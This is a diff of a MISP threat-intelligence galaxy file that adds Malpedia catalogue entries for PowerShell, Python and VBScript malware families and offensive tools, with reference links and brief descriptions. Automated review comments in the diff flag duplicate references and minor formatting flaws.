 "uuid": "60d7f668-66b6-401b-976f-918470a23c3d",
 "value": "POWERPIPE"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor",
+ "https://github.com/chrisjd20/powershell_web_backdoor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4310dcab-0820-4bc1-8a0b-9691c20f5b49",
+ "value": "powershell_web_backdoor"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower",
+ "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "https://securelist.com/recent-cloud-atlas-activity/92016/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0959a02e-6eba-43dc-bbbf-b2c7488e9371",
+ "value": "PowerShower"
+ },
 {
 "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
 "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
 ],
 "synonyms": [],
@@ -3464,12 +6726,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats",
+ "https://blog.prevailion.com/2020/01/summer-mirage.html",
+ "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
+ "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
 "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/",
- "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
- "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
 "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
 "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
+ "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
 "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/"
 ],
 "synonyms": [
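Review bot: The rebuilt `refs` list for ps1.powerstats carries the same Secureworks profile twice, once as `"http://www.secureworks.com/research/threat-profiles/cobalt-ulster"` and again as `"https://www.secureworks.com/research/threat-profiles/cobalt-ulster"`. The plain-http variant adds nothing and is the one a consumer following the link would fetch unencrypted, so dropping it leaves a single canonical entry. If the list comes straight from the Malpedia export, the duplicate is worth fixing upstream as well, since a scheme-insensitive dedup before emitting refs would stop it recurring. The enclosing entry starts before this hunk.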
@@ -3480,6 +6749,25 @@
 "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9",
 "value": "POWERSTATS"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://www.symantec.com/security-center/writeup/2019-062513-4935-99",
+ "https://norfolkinfosec.com/apt33-powershell-malware/",
+ "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/",
+ "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "08d5b8a4-e752-48f3-ac6d-944807146ce7",
+ "value": "POWERTON"
+ },
 {
 "description": "",
 "meta": {
@@ -3493,6 +6781,36 @@
 "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c",
 "value": "PowerWare"
 },
+ {
+ "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure",
+ "https://github.com/hausec/PowerZure"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f5fa77e9-9851-48a6-864d-e0448de062d4",
+ "value": "PowerZure"
+ },
+ {
+ "description": "DLL loader that decrypts and runs a powershell-based downloader.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop",
+ "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d8429f6d-dc4b-4aae-930d-234156dbf354",
+ "value": "PowGoop"
+ },
 {
 "description": "",
 "meta": {
@@ -3525,7 +6843,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
+ "https://youtu.be/pBDu8EGWRC4?t=2492",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html"
 ],
 "synonyms": [],
 "type": []
@@ -3539,6 +6859,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
+ "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
 ],
 "synonyms": [],
@@ -3547,24 +6868,84 @@ "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks", + "https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3c627182-e4ee-4db0-9263-9d657a5d7c98", + "value": "Schtasks" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat", + "https://github.com/YSCHGroup/SkyRAT" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8e5d7d24-9cdd-4376-a6c7-967273dfeeab", + "value": "skyrat" + }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", - "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", - "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", + "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", + "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + 
"https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://threatpost.com/sload-spying-payload-delivery-bits/151120/", + "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/", + "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", + "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], - "synonyms": [], + "synonyms": [ + "Starslord" + ], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy", + "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "773a6520-d164-4727-8351-c4201b04f10b", + "value": "Snugy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort", + "https://github.com/itsKindred/malware-analysis-writeups/blob/master/swrort-dropper/swrort-stager-analysis.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3347a1bc-6b4d-459c-98a5-746bab12d011", + "value": "Swrort Stager" + }, { "description": "", "meta": { 
@@ -3591,6 +6972,50 @@
 "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4",
 "value": "ThunderShell"
 },
+ {
+ "description": "Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001",
+ "https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "77231587-0dbe-4064-97b5-d7f4a2e3dc67",
+ "value": "Unidentified PS 001"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine",
+ "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/",
+ "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry",
+ "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/",
+ "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
+ "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf",
+ "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "beb4f2b3-85d1-491d-8ae1-f7933f00f820",
+ "value": "WannaMine"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader",
+ "https://twitter.com/blackorbird/status/1247834024711577601"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c9ef106e-def9-4229-8373-616a298ed645",
+ "value": "WannaRen Downloader"
+ },
 {
 "description": "",
 "meta": {
@@ -3604,6 +7029,32 @@
 "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
 "value": "WMImplant"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist",
+ "https://github.com/NullArray/Archivist"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2095a09c-3fdd-4164-b82e-2e9a41affd8e",
+ "value": "Archivist"
+ },
+ {
+ "description": "Ares is a Python RAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.ares",
+ "https://github.com/sweetsoftware/Ares"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c4a578de-bebe-49bf-8af1-407857acca95",
+ "value": "Ares"
+ },
 {
 "description": "",
 "meta": {
@@ -3611,7 +7062,6 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot",
 "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
 "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
- "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
 "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
 "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
@@ -3624,11 +7074,118 @@ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c", + "https://github.com/0x09AL/DropboxC2C" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53dd4a8b-374e-48b6-a7c8-58af0e31f435", + "value": "DropboxC2C" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer", + "https://github.com/nairuzabulhul/KeyPlexer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93", + "value": "KeyPlexer" + }, + { + "description": "The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne", + "https://github.com/AlessandroZ/LaZagne", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c752f295-7f08-4cb0-92d5-a0c562abd08c", + "value": "LaZagne" + }, + { + "description": "An IRC bot written in (obfuscated) Python code. 
Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph", + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/" + ], + "synonyms": [ + "FreakOut" + ], + "type": [] + }, + "uuid": "2351539a-165a-4886-b5fe-f56fdf6b167a", + "value": "N3Cr0m0rPh" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.networm", + "https://github.com/pylyf/NetWorm" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c6acd00-cdc2-460d-8edf-003b84875b5d", + "value": "NetWorm" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat", + "https://vk.com/m228228?w=wall306895781_177" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bca94d33-e5a1-4bcc-981e-f35fd74a79d1", + "value": "PIRAT" + }, + { + "description": "Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. 
Exfiltration happens through FTP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat", + "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://blog.talosintelligence.com/2020/10/poetrat-update.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b07819a9-a2f7-454d-a520-c6424cbf1ed4", + "value": "Poet RAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], 
@@ -3637,6 +7194,48 @@
 "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa",
 "value": "pupy (Python)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyark",
+ "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "01f15f4e-dd40-4246-9b99-c0d81306e37f",
+ "value": "PyArk"
+ },
+ {
+ "description": "PyVil RAT",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil",
+ "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat",
+ "https://twitter.com/ESETresearch/status/1360178593968623617"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2cf75f3c-116f-4faf-bd32-ba3a5e2327cf",
+ "value": "PyVil"
+ },
+ {
+ "description": "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.responder",
+ "https://github.com/lgandx/Responder"
+ ],
+ "synonyms": [
+ "SpiderLabs Responder"
+ ],
+ "type": []
+ },
+ "uuid": "3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc",
+ "value": "Responder"
+ },
 {
 "description": "",
 "meta": {
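Review bot: `"description": "PyVil RAT"` on the new py.pyvil entry only repeats the entry's own value and tells a consumer nothing the name does not; either leave it `""` like the neighbouring PyArk entry, as the rest of this file does when no summary is available, or write the one-sentence summary the cited Cybereason report supports. The Responder description in the same hunk ends with a trailing space inside the string (`...Basic HTTP authentication. "`), which survives into every MISP rendering of the galaxy; trim it to `authentication."`. If the text is copied verbatim from the Malpedia export, both are better fixed upstream so they do not reappear on the next refresh.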
@@ -3651,6 +7250,85 @@ "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow", + "https://github.com/TheSph1nx/SpaceCow" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff5c0845-6740-45d5-bd34-1cf69c635356", + "value": "SpaceCow" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler", + "https://habr.com/en/sandbox/135410/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "689247a2-4e75-4802-ab94-484fc3d6a18e", + "value": "stealler" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", + "https://github.com/nathanlopez/Stitch" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6239201b-a0bd-4f01-8bbe-79c6fc5fa861", + "value": "Stitch" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d96cd1e-98f4-4784-9982-397c5df19bd9", + "value": "unidentified_001" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7e5fe6ca-3323-409a-a5bb-d34f60197b99", + "value": "unidentified_002" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" + ], + "synonyms": [], + "type": [] + }, + "uuid": "43282411-4999-4066-9b99-2e94a17acbd4", + "value": 
"unidentified_003" + }, { "description": "", "meta": { 
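Review bot: The three new `py.unidentified_00N` entries list the Malpedia detail URL twice in `refs` — for the first one `"https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"` is both elements of the array — so each entry carries no external reference at all, and any consumer that deduplicates refs will see a one-item list. Either drop the duplicate so only the canonical Malpedia link remains, or, if the exporter prepends the detail URL to the source's own reference list unconditionally, skip it when that list already contains it. The same pattern appears in unidentified_002 and unidentified_003 in this hunk.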
@@ -3664,12 +7342,56 @@ "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks", + "https://persianov.net/windows-worms-forbix-worm-analysis", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99" + ], + "synonyms": [ + "Forbix" + ], + "type": [] + }, + "uuid": "2ad12163-3a8e-4ece-969e-ac616303ebe1", + "value": "forbiks" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr", + "https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ca31b9b-6e78-4dcc-9d14-dfd97d44994e", + "value": "GGLdr" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju", + "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8", + "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0a64323-62a6-4c5a-bb3d-44bd3b11507f", + "value": "Grinju Downloader" + }, { "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", 
"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", "https://attack.mitre.org/software/S0151/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "synonyms": [], 
@@ -3678,6 +7400,160 @@ "uuid": "095c995c-c916-488e-944d-a3f4b9842926", "value": "HALFBAKED" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou", + "https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186" + ], + "synonyms": [ + "Love Bug", + "LoveLetter" + ], + "type": [] + }, + "uuid": "bba3f3c9-f65f-45f1-a482-7209b9fa5adb", + "value": "Iloveyou" + }, + { + "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion", + "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", + "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", + "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", + "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", + "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97f89048-2a57-48d5-9272-0d1061a14eca", + "value": "lampion" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/lockscreen-ransomware-phishing-leads-to-google-play-card-scam/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a583a2db-616e-48e5-b12b-088a378c2307", + "value": "lockscreen" + }, + { + "description": "Downloads NodeJS when deployed.", + "meta": { + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom", + "https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "93c87125-7150-4bc6-a0f9-b46ff8de1839", + "value": "NodeJS Ransomware" + }, + { + "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter", + "https://github.com/Cn33liz/StarFighters" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e24b852c-3ede-42ac-8d04-68ab96bf53a0", + "value": "Starfighter (VBScript)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001", + "https://twitter.com/JohnLaTwC/status/1118278148993339392" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ba354d45-bc41-40cd-93b2-26139db296bd", + "value": "Unidentified VBS 001" + }, + { + "description": "Unnamed malware. 
Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002", + "https://www.clearskysec.com/operation-kremlin/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d8e8d701-ebe4-44ab-8c5b-70a11246ddf1", + "value": "Unidentified 002 (Operation Kremlin)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003", + "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d5955c4b-f507-4b3f-8d57-080849aba831", + "value": "Unidentified 003 (Gamaredon Downloader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dc857b7d-f228-4aa5-9e89-f7e17bb7ea8c", + "value": "WhiteShadow" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", + "https://habr.com/ru/company/group-ib/blog/477198/", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89" + ], + "synonyms": [ + "404KeyLogger", + "Snake Keylogger" + ], + "type": [] + }, + "uuid": "6b87fada-86b3-449d-826d-a89858121b68", + "value": "404 Keylogger" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat", + "https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf" + 